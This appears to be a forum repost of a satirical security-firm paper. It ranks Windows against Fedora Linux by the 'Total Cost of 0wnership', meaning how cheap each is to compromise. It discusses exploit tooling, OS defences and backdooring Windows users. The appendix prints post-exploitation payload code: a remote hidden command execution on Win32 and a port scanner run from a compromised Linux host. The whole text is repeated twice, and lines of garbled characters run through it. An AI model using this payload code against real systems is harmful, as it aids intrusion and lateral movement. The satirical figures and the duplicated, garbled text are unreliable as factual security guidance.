S
starwars
www.immunitysec.com/downloads/tc0.pdf
Microsoft has long asked third party analysts for accurateassessments of
the total cost of ownership of Microsoft Windowsdeployments, especially
against the Linux deployments commonlygoing into all segments of the
market. However, Immunity, Inc. as athird party assessment provider has,
until now, not done a thoroughanalysis, using Immunity proprietary data
to tell the true story aboutthe costs of Open Source. Other sources of
3rdparty information can be found
here:http://www.microsoft.com/mscorp/facts/default.aspThe point of
contact for this paper is Dave Aitel, Vice President ofMedia Relations,
Immunity, Inc. He can be reached (e-mail address removed). Further
information on Immunity, Inc. isavailable at
http://www.immunitysec.com.Executive SummaryBased on our analysis,
Microsoft Windows has one half the Total Costof 0wnership (TC0) of modern
Fedora Core Linux based technologies.ƒ´ƒÙƒÖƒÖƒÙƒÓƒåƒÜƒäƒéƒnƒßƒÖƒnƒßƒçƒÞƒÙƒÞƒ×ƒnƒÇƒÙƒÞƒÔƒßƒçƒãƒnƒæƒãƒ´ƒÙƒÖƒÖƒÙƒÓ
ƒåƒÜƒäƒéƒnƒäƒßƒnƒÝƒÑƒÛƒÕƒnƒäƒØƒÙƒãƒnƒ×ƒâƒÑƒàƒØƒ¿ƒàƒÕƒÞƒ¿ƒÖƒÖƒÙƒÓƒÕ
ƒÇƒÙƒÞƒÔƒßƒçƒãImmunity's MethodologyImmunity has four major services: Training
on exploit developmentand vulnerability analysis, Application Security
Consulting, theCANVAS assessment product, and the Immunity Vulnerability
SharingClub. In each of these, the costs to penetrate (0wn) systems based
onMicrosoft Windows Technologies was compared to the costs against
amodern Linux system. In general there are three aspects to 0wning
asystem. These three things, Vulnerability Detection, ExploitDevelopment,
and Attack Execution, were used by Immunity todetermine the costs to 0wn
the different operating systems inconfigurations encountered during
Immunity engagements. AsImmunity is not in the rootkit (www.rootkit.com)
writing business, thispaper does not cover the costs of maintaining
0wnership over a givenOS.Vulnerability DetectionThere are several factors
that affect how difficult it is to findvulnerabilities on a target
platform. Some of these are listed below.Immunity's judgments are drawn
from our current collection ofremote 0day in the VSC, countless 0day in
custom applications forImmunity Consulting customers across many
different operatingsystems and over 80 remote exploits in
CANVAS.Portability of common exploit development toolsIDA-Pro, the
premier disassembler and reverse engineering tool (adatabase and a
disassembler together make for a powerfulcombination) is able to
disassemble both Linux and Windows binaries,but only runs on Windows. A
Linux version is, however, rumored to bein the works.
PDB (Python Debugger), Immunity's newest tool in the armory, isavailable
only for Windows (although the client is available on bothLinux and
Windows). This tool allows for many advanced scripts to berun, widely
automating the exploit development process.Ollydbg (Visual Debugger), is
far superior to GDB in many waysneeded for exploit development. In
addition, windbg and Softiceprovide valuable options for debugging at the
kernel and user level.The TC0 advantage is clearly obvious for the
Windows platform.Availability of FishFinding a vulnerability is like
finding a fish. If the pond is overfished,it's harder to find them.
Hackers are rather evenly split betweenrunning Linux and running Mac OSX.
As much as few professionalNASCAR drivers drive Dodge Neons, a negligible
amount of skilledhackers use Windows as their primary OS. Not to mention,
many Win32 fish are given out for free by Microsoftwhen releasing
patches. (See http://sabre-security.com/for BinDiff).Here, there can be
only one option. Even extremely modern versionsof Windows have a TC0 much
lower than older Linuxes.Time to 0dayImmunity's team is typically tasked
with three major fronts at a time.One front, to develop old exploits for
CANVAS, is ongoing. Thesecond, to develop new infrastructure for CANVAS.
The third, toassess major system components of various operating systems
andproducts to discover new vulnerabilities. The time between
Immunitymanagement requesting a vulnerability against a particular
operatingsystem and one of Immunity's researchers delivering a
suitablevulnerability is described as the ¡§Time to 0day¡¨. This TT0
provides aconvenient metric for the process of vulnerability discovery
underdifferent operating systems.Operating SystemNumber of 0dayAverage
TimeMac OS X3 1 hourWindows2000/XP/20034 3 daysLinux (FC2)3 6 daysAs
clearly demonstrated, other than the toy OS Mac OS X, Windowshas the
lowest TC0 on the market.Exploit DevelopmentThere are many levels of
defenses in a modern operating system. Eachof these has implementation
weaknesses and strengths. Overall,Windows has a large advantage in TC0 as
demonstrated by thefollowing sections.Kernel-level defensesExecshield
comes by default with Fedora Core 1 and 2, a superiorprotection, PaX, can
be installed at no cost. Notably, this protectiondoes not prevent Linux
from being 0wned when a third party programis installed. Unreal
Tournament is a good example of a program whichhas an executable stack
when installed even on Fedora Core 2. WithPaX installed, even the kernel
has moderate levels of protectionagainst standard buffer overflow attacks.
PaX is a great example of a kernel level protection done by a thirdparty.
In the Open Source community, protections compete by theirmerit. In the
Windows community, it is impossible to have a goodkernel level protection
implemented by a vendor other than Microsoft,which allows for greater
manageability by both users and hackers.
Hence, out of the box Windows has no protection of this nature at
all.Windows XP SP2 plans to support W^X style protection (somewhatweaker
than Execshield!) but only with hardware support1. Currently,this means
that N^X is not available, and it most likely will not bewidely deployed
for some time on the Windows platform.
In addition, kernel layer segmentation provided by chroot() can oftenbe a
nightmare when exploiting Linux. While group policies and othercomplex
ACLs can sometimes be deployed on the Windows Platform,this is
comparatively rare, and often, due to sheer complexity, easilyworked
around.
The TC0 advantage is clearly for the Windows Platform.Executable
DefensesVarious options assigned to the compiler and system libraries
canmake a big difference in platform exploitability, and hence, TC0.
Theseare detailed below.Compiler defensesBoth Linux and Windows come with
stack canaries built into theircompilers. In Linux, this is via
Propolice, and in Windows, via /gS.Both are reasonably equivalent, except
that Win32 processes have aoverly complex exception management procedure,
which tends tomake overcoming such protections a lot easier than on
Linux.Windows binaries currently undergo some advanced
vulnerabilitydetection routines (prefix and prefast) as well. These
measures arecurrently ineffective but may raise the TC0 of Windows in the
future.1 Software support is limited and given in some small detail at
the URL below. It isnot general purpose protection at the level of PaX or
ExecSheild.
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2mempr.ms
p
xLibrary DefensesModern Windows (as of XP SP2) contains heap overflow
protection.This raises its TC0 dramatically, but is not yet in production
and hasnot been considered for this survey. Shellcode, MOSDEF and other
Exploit InfrastructureImmunity CANVAS employs an advanced exploit payload
systemknown as MOSDEF. This system allows for ¡§C remoting¡¨ across
hostboundaries. For example, after you attack a system running FedoraCore
2, you can then have the MOSDEF system run a TCP portscanner module on
that target and send you back the results. It doesthis by compiling a C
proglet into shellcode, and having it executed inthe remote systems'
process space.So one of the major factors when building CANVAS for each
platformwas ¡§How much does it cost to build MOSDEF for that platform?¡¨
Thisis complicated by the costs of MOSDEF that are spread across
bothplatforms. For example, the C compiler and the X86 assembler. So
onemust do comparisons based on the costs of creating platform
specificchanges. This is mostly relegated to the initial stages of an
exploit'sshellcode and to special effects.On Linux, system calls go
directly to the kernel, but on Windows, youmust first traverse user-land
level libraries such as kernel32.dll. Thismajor architectural difference
has conflicting results. At first, it makesthings much harder, as the
process heaps must be cleaned up beforeyou can proceed to using socket
calls and establishing outboundconnections. However, once this is done,
the full Win32 API is thenavailable to you, and you can use it without
reimplementing libc, asyou have to do in Linux. This makes post-exploit
development mucheasier, as shown by the following code fragment in
Appendix A.Static AddressesA modern Linux has few static addresses.
Windows, on the otherhand, has thousands of different global variables an
exploit developercan use to exploit a target. The PEB is just one
example.Attack ExecutionThere are quite a few places where running your
attacks against atarget can be a difficult and painful experience.
Remotemanageability, patching, and other areas are places where
Windowstruly shines. For these reasons, we find that the Windows
advantagein Total Cost of 0wnership extends to every level of our
testing.Patch MaintenanceBoth Fedora Core and Windows systems include
automatic patchupdating. However, only Fedora Core supports non core OS
products,such as image manipulation programs. As such, Fedora Core is
morelikely to be updated than Windows systems. User ErrorFew Windows
users can identify the purpose of all the processesrunning on their
system. Even fewer know what tool to use to discoverwhich processes are
listening on which ports. In Linux, this is builtinto the netstat
program. It's unlikely a Windows user will even knowhow to determine
which users are able to log in remotely to theirsystem. Adding new
capabilities to users is a common and entirelyeffective way to backdoor a
Windows system.SummaryImmunity's findings clearly show that the best
platform for yourtargets to be running is Microsoft Windows, allowing you
unparalleledvalue for their dollar. This result reinforces the fact that
its importantto consider more than just licensing fees when your targets
choosetheir OS. Indeed, a variety of factors go into their choice, and
overtime, Windows has demonstrated itself to be the top contender in
the,in both the server and the desktop space for Total Cost of 0wnership.
Appendix A ¡V MOSDEF examplesA Win32 popen() fragment in MOSDEFvars={}
vars["command"]=command
vars["cmdexe"]=cmdexe
vars["stdin"]=hChildStdinRd
vars["stdout"]=hChildStdoutWr
code="""
#import "local","sendint" as "sendint"
#import "remote","kernel32.dll|GetStartupInfoA" as
"getstartupinfoa"
#import "remote","kernel32.dll|CreateProcessA" as
"createprocessa"
#import "string","cmdexe" as "cmdexe"
#import "string","command" as "command"
#import "local", "memset" as "memset"
#import "int", "stdin" as "stdin"
#import "int", "stdout" as "stdout"
//#import "local", "debug" as "debug"
struct STARTUPINFO {
int cb;
char * lpReserved;
char * lpDesktop;
char * lpTitle;
int dwX;
int dwY;
int dwXSize;
int dwYSize;
int dwXCountChars;
int dwYCountChars;
int dwFillAttribute;
int dwFlags;
short int wShowWindow;
short int cbReserved2;
int * lpReserved2;
int hStdInput;
int hStdOutput;
int hStdError;
};
void main() {
struct STARTUPINFO si;
int inherithandles;
int i;
char pi[32];
memset(pi,0,16);
inherithandles=1;
getstartupinfoa(&si);si.dwFlags=0x0101; //STARTF_USESTDHANDLES |
STARTF_USESHOWWINDOW
si.wShowWindow=0;
si.hStdInput=stdin;
si.hStdOutput=stdout;
si.hStdError=stdout;
i=createprocessa
(cmdexe,command,0,0,inherithandles,0,0,0,&si,pi);
sendint(i);
}
"""
request=self.compile(code,vars)
self.sendrequest(request)
ret=self.readint()A Linux TCP Portscanner in MOSDEFvars={}
vars["startip"]=startip
vars["numberofips"]=numberofips
vars["AF_INET"]=AF_INET
vars["SOCK_STREAM"]=SOCK_STREAM
vars["startport"]=startport
vars["endport"]=endport
code="""
#import "local", "connect" as "connect"
#import "local", "close" as "close"
#import "local", "socket" as "socket"
#import "local", "sendint" as "sendint"
#import "local", "htons" as "htons"
#import "local", "htonl" as "htonl"
#import "local", "debug" as "debug"
#import "int", "startip" as "startip"
#import "int", "startport" as "startport"
#import "int", "endport" as "endport"
#import "int", "numberofips" as "numberofips"
#import "int", "AF_INET" as "AF_INET"
#import "int", "SOCK_STREAM" as "SOCK_STREAM"
#include "socket.h"
void main()
{
int currentport;
int sockfd;
int fd;
int doneips;
int currentip;
struct sockaddr_in serv_addr;
serv_addr.family=AF_INET; //af_inet
currentip=startip;
doneips=0;
while (doneips //FOR EACH IP...
doneips=doneips+1;
serv_addr.addr=htonl(currentip);
currentport=startport;
while (currentport //FOR EACH PORT
//debug();
sockfd=socket(AF_INET,SOCK_STREAM,0);
//debug();
serv_addr.port=htons(currentport);
if (connect(sockfd,&serv_addr,16)==0) {
//sendint(23);
sendint(currentport);
}
//debug();
//sendint(22);
close(sockfd);
//sendint(20);
currentport=currentport+1;
//sendint(21);
}
currentip=currentip+1;
}
sendint(0xffffffff);
}
"""
request=self.compile(code,vars)
self.sendrequest(request)
port=0
openports=[]
while port!=-1:
port=self.readint()
if port!=-1:
openports.append(port)
return openports
Microsoft has long asked third party analysts for accurateassessments of
the total cost of ownership of Microsoft Windowsdeployments, especially
against the Linux deployments commonlygoing into all segments of the
market. However, Immunity, Inc. as athird party assessment provider has,
until now, not done a thoroughanalysis, using Immunity proprietary data
to tell the true story aboutthe costs of Open Source. Other sources of
3rdparty information can be found
here:http://www.microsoft.com/mscorp/facts/default.aspThe point of
contact for this paper is Dave Aitel, Vice President ofMedia Relations,
Immunity, Inc. He can be reached (e-mail address removed). Further
information on Immunity, Inc. isavailable at
http://www.immunitysec.com.Executive SummaryBased on our analysis,
Microsoft Windows has one half the Total Costof 0wnership (TC0) of modern
Fedora Core Linux based technologies.ƒ´ƒÙƒÖƒÖƒÙƒÓƒåƒÜƒäƒéƒnƒßƒÖƒnƒßƒçƒÞƒÙƒÞƒ×ƒnƒÇƒÙƒÞƒÔƒßƒçƒãƒnƒæƒãƒ´ƒÙƒÖƒÖƒÙƒÓ
ƒåƒÜƒäƒéƒnƒäƒßƒnƒÝƒÑƒÛƒÕƒnƒäƒØƒÙƒãƒnƒ×ƒâƒÑƒàƒØƒ¿ƒàƒÕƒÞƒ¿ƒÖƒÖƒÙƒÓƒÕ
ƒÇƒÙƒÞƒÔƒßƒçƒãImmunity's MethodologyImmunity has four major services: Training
on exploit developmentand vulnerability analysis, Application Security
Consulting, theCANVAS assessment product, and the Immunity Vulnerability
SharingClub. In each of these, the costs to penetrate (0wn) systems based
onMicrosoft Windows Technologies was compared to the costs against
amodern Linux system. In general there are three aspects to 0wning
asystem. These three things, Vulnerability Detection, ExploitDevelopment,
and Attack Execution, were used by Immunity todetermine the costs to 0wn
the different operating systems inconfigurations encountered during
Immunity engagements. AsImmunity is not in the rootkit (www.rootkit.com)
writing business, thispaper does not cover the costs of maintaining
0wnership over a givenOS.Vulnerability DetectionThere are several factors
that affect how difficult it is to findvulnerabilities on a target
platform. Some of these are listed below.Immunity's judgments are drawn
from our current collection ofremote 0day in the VSC, countless 0day in
custom applications forImmunity Consulting customers across many
different operatingsystems and over 80 remote exploits in
CANVAS.Portability of common exploit development toolsIDA-Pro, the
premier disassembler and reverse engineering tool (adatabase and a
disassembler together make for a powerfulcombination) is able to
disassemble both Linux and Windows binaries,but only runs on Windows. A
Linux version is, however, rumored to bein the works.
PDB (Python Debugger), Immunity's newest tool in the armory, isavailable
only for Windows (although the client is available on bothLinux and
Windows). This tool allows for many advanced scripts to berun, widely
automating the exploit development process.Ollydbg (Visual Debugger), is
far superior to GDB in many waysneeded for exploit development. In
addition, windbg and Softiceprovide valuable options for debugging at the
kernel and user level.The TC0 advantage is clearly obvious for the
Windows platform.Availability of FishFinding a vulnerability is like
finding a fish. If the pond is overfished,it's harder to find them.
Hackers are rather evenly split betweenrunning Linux and running Mac OSX.
As much as few professionalNASCAR drivers drive Dodge Neons, a negligible
amount of skilledhackers use Windows as their primary OS. Not to mention,
many Win32 fish are given out for free by Microsoftwhen releasing
patches. (See http://sabre-security.com/for BinDiff).Here, there can be
only one option. Even extremely modern versionsof Windows have a TC0 much
lower than older Linuxes.Time to 0dayImmunity's team is typically tasked
with three major fronts at a time.One front, to develop old exploits for
CANVAS, is ongoing. Thesecond, to develop new infrastructure for CANVAS.
The third, toassess major system components of various operating systems
andproducts to discover new vulnerabilities. The time between
Immunitymanagement requesting a vulnerability against a particular
operatingsystem and one of Immunity's researchers delivering a
suitablevulnerability is described as the ¡§Time to 0day¡¨. This TT0
provides aconvenient metric for the process of vulnerability discovery
underdifferent operating systems.Operating SystemNumber of 0dayAverage
TimeMac OS X3 1 hourWindows2000/XP/20034 3 daysLinux (FC2)3 6 daysAs
clearly demonstrated, other than the toy OS Mac OS X, Windowshas the
lowest TC0 on the market.Exploit DevelopmentThere are many levels of
defenses in a modern operating system. Eachof these has implementation
weaknesses and strengths. Overall,Windows has a large advantage in TC0 as
demonstrated by thefollowing sections.Kernel-level defensesExecshield
comes by default with Fedora Core 1 and 2, a superiorprotection, PaX, can
be installed at no cost. Notably, this protectiondoes not prevent Linux
from being 0wned when a third party programis installed. Unreal
Tournament is a good example of a program whichhas an executable stack
when installed even on Fedora Core 2. WithPaX installed, even the kernel
has moderate levels of protectionagainst standard buffer overflow attacks.
PaX is a great example of a kernel level protection done by a thirdparty.
In the Open Source community, protections compete by theirmerit. In the
Windows community, it is impossible to have a goodkernel level protection
implemented by a vendor other than Microsoft,which allows for greater
manageability by both users and hackers.
Hence, out of the box Windows has no protection of this nature at
all.Windows XP SP2 plans to support W^X style protection (somewhatweaker
than Execshield!) but only with hardware support1. Currently,this means
that N^X is not available, and it most likely will not bewidely deployed
for some time on the Windows platform.
In addition, kernel layer segmentation provided by chroot() can oftenbe a
nightmare when exploiting Linux. While group policies and othercomplex
ACLs can sometimes be deployed on the Windows Platform,this is
comparatively rare, and often, due to sheer complexity, easilyworked
around.
The TC0 advantage is clearly for the Windows Platform.Executable
DefensesVarious options assigned to the compiler and system libraries
canmake a big difference in platform exploitability, and hence, TC0.
Theseare detailed below.Compiler defensesBoth Linux and Windows come with
stack canaries built into theircompilers. In Linux, this is via
Propolice, and in Windows, via /gS.Both are reasonably equivalent, except
that Win32 processes have aoverly complex exception management procedure,
which tends tomake overcoming such protections a lot easier than on
Linux.Windows binaries currently undergo some advanced
vulnerabilitydetection routines (prefix and prefast) as well. These
measures arecurrently ineffective but may raise the TC0 of Windows in the
future.1 Software support is limited and given in some small detail at
the URL below. It isnot general purpose protection at the level of PaX or
ExecSheild.
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2mempr.ms
p
xLibrary DefensesModern Windows (as of XP SP2) contains heap overflow
protection.This raises its TC0 dramatically, but is not yet in production
and hasnot been considered for this survey. Shellcode, MOSDEF and other
Exploit InfrastructureImmunity CANVAS employs an advanced exploit payload
systemknown as MOSDEF. This system allows for ¡§C remoting¡¨ across
hostboundaries. For example, after you attack a system running FedoraCore
2, you can then have the MOSDEF system run a TCP portscanner module on
that target and send you back the results. It doesthis by compiling a C
proglet into shellcode, and having it executed inthe remote systems'
process space.So one of the major factors when building CANVAS for each
platformwas ¡§How much does it cost to build MOSDEF for that platform?¡¨
Thisis complicated by the costs of MOSDEF that are spread across
bothplatforms. For example, the C compiler and the X86 assembler. So
onemust do comparisons based on the costs of creating platform
specificchanges. This is mostly relegated to the initial stages of an
exploit'sshellcode and to special effects.On Linux, system calls go
directly to the kernel, but on Windows, youmust first traverse user-land
level libraries such as kernel32.dll. Thismajor architectural difference
has conflicting results. At first, it makesthings much harder, as the
process heaps must be cleaned up beforeyou can proceed to using socket
calls and establishing outboundconnections. However, once this is done,
the full Win32 API is thenavailable to you, and you can use it without
reimplementing libc, asyou have to do in Linux. This makes post-exploit
development mucheasier, as shown by the following code fragment in
Appendix A.Static AddressesA modern Linux has few static addresses.
Windows, on the otherhand, has thousands of different global variables an
exploit developercan use to exploit a target. The PEB is just one
example.Attack ExecutionThere are quite a few places where running your
attacks against atarget can be a difficult and painful experience.
Remotemanageability, patching, and other areas are places where
Windowstruly shines. For these reasons, we find that the Windows
advantagein Total Cost of 0wnership extends to every level of our
testing.Patch MaintenanceBoth Fedora Core and Windows systems include
automatic patchupdating. However, only Fedora Core supports non core OS
products,such as image manipulation programs. As such, Fedora Core is
morelikely to be updated than Windows systems. User ErrorFew Windows
users can identify the purpose of all the processesrunning on their
system. Even fewer know what tool to use to discoverwhich processes are
listening on which ports. In Linux, this is builtinto the netstat
program. It's unlikely a Windows user will even knowhow to determine
which users are able to log in remotely to theirsystem. Adding new
capabilities to users is a common and entirelyeffective way to backdoor a
Windows system.SummaryImmunity's findings clearly show that the best
platform for yourtargets to be running is Microsoft Windows, allowing you
unparalleledvalue for their dollar. This result reinforces the fact that
its importantto consider more than just licensing fees when your targets
choosetheir OS. Indeed, a variety of factors go into their choice, and
overtime, Windows has demonstrated itself to be the top contender in
the,in both the server and the desktop space for Total Cost of 0wnership.
Appendix A ¡V MOSDEF examplesA Win32 popen() fragment in MOSDEFvars={}
vars["command"]=command
vars["cmdexe"]=cmdexe
vars["stdin"]=hChildStdinRd
vars["stdout"]=hChildStdoutWr
code="""
#import "local","sendint" as "sendint"
#import "remote","kernel32.dll|GetStartupInfoA" as
"getstartupinfoa"
#import "remote","kernel32.dll|CreateProcessA" as
"createprocessa"
#import "string","cmdexe" as "cmdexe"
#import "string","command" as "command"
#import "local", "memset" as "memset"
#import "int", "stdin" as "stdin"
#import "int", "stdout" as "stdout"
//#import "local", "debug" as "debug"
struct STARTUPINFO {
int cb;
char * lpReserved;
char * lpDesktop;
char * lpTitle;
int dwX;
int dwY;
int dwXSize;
int dwYSize;
int dwXCountChars;
int dwYCountChars;
int dwFillAttribute;
int dwFlags;
short int wShowWindow;
short int cbReserved2;
int * lpReserved2;
int hStdInput;
int hStdOutput;
int hStdError;
};
void main() {
struct STARTUPINFO si;
int inherithandles;
int i;
char pi[32];
memset(pi,0,16);
inherithandles=1;
getstartupinfoa(&si);si.dwFlags=0x0101; //STARTF_USESTDHANDLES |
STARTF_USESHOWWINDOW
si.wShowWindow=0;
si.hStdInput=stdin;
si.hStdOutput=stdout;
si.hStdError=stdout;
i=createprocessa
(cmdexe,command,0,0,inherithandles,0,0,0,&si,pi);
sendint(i);
}
"""
request=self.compile(code,vars)
self.sendrequest(request)
ret=self.readint()A Linux TCP Portscanner in MOSDEFvars={}
vars["startip"]=startip
vars["numberofips"]=numberofips
vars["AF_INET"]=AF_INET
vars["SOCK_STREAM"]=SOCK_STREAM
vars["startport"]=startport
vars["endport"]=endport
code="""
#import "local", "connect" as "connect"
#import "local", "close" as "close"
#import "local", "socket" as "socket"
#import "local", "sendint" as "sendint"
#import "local", "htons" as "htons"
#import "local", "htonl" as "htonl"
#import "local", "debug" as "debug"
#import "int", "startip" as "startip"
#import "int", "startport" as "startport"
#import "int", "endport" as "endport"
#import "int", "numberofips" as "numberofips"
#import "int", "AF_INET" as "AF_INET"
#import "int", "SOCK_STREAM" as "SOCK_STREAM"
#include "socket.h"
void main()
{
int currentport;
int sockfd;
int fd;
int doneips;
int currentip;
struct sockaddr_in serv_addr;
serv_addr.family=AF_INET; //af_inet
currentip=startip;
doneips=0;
while (doneips //FOR EACH IP...
doneips=doneips+1;
serv_addr.addr=htonl(currentip);
currentport=startport;
while (currentport //FOR EACH PORT
//debug();
sockfd=socket(AF_INET,SOCK_STREAM,0);
//debug();
serv_addr.port=htons(currentport);
if (connect(sockfd,&serv_addr,16)==0) {
//sendint(23);
sendint(currentport);
}
//debug();
//sendint(22);
close(sockfd);
//sendint(20);
currentport=currentport+1;
//sendint(21);
}
currentip=currentip+1;
}
sendint(0xffffffff);
}
"""
request=self.compile(code,vars)
self.sendrequest(request)
port=0
openports=[]
while port!=-1:
port=self.readint()
if port!=-1:
openports.append(port)
return openports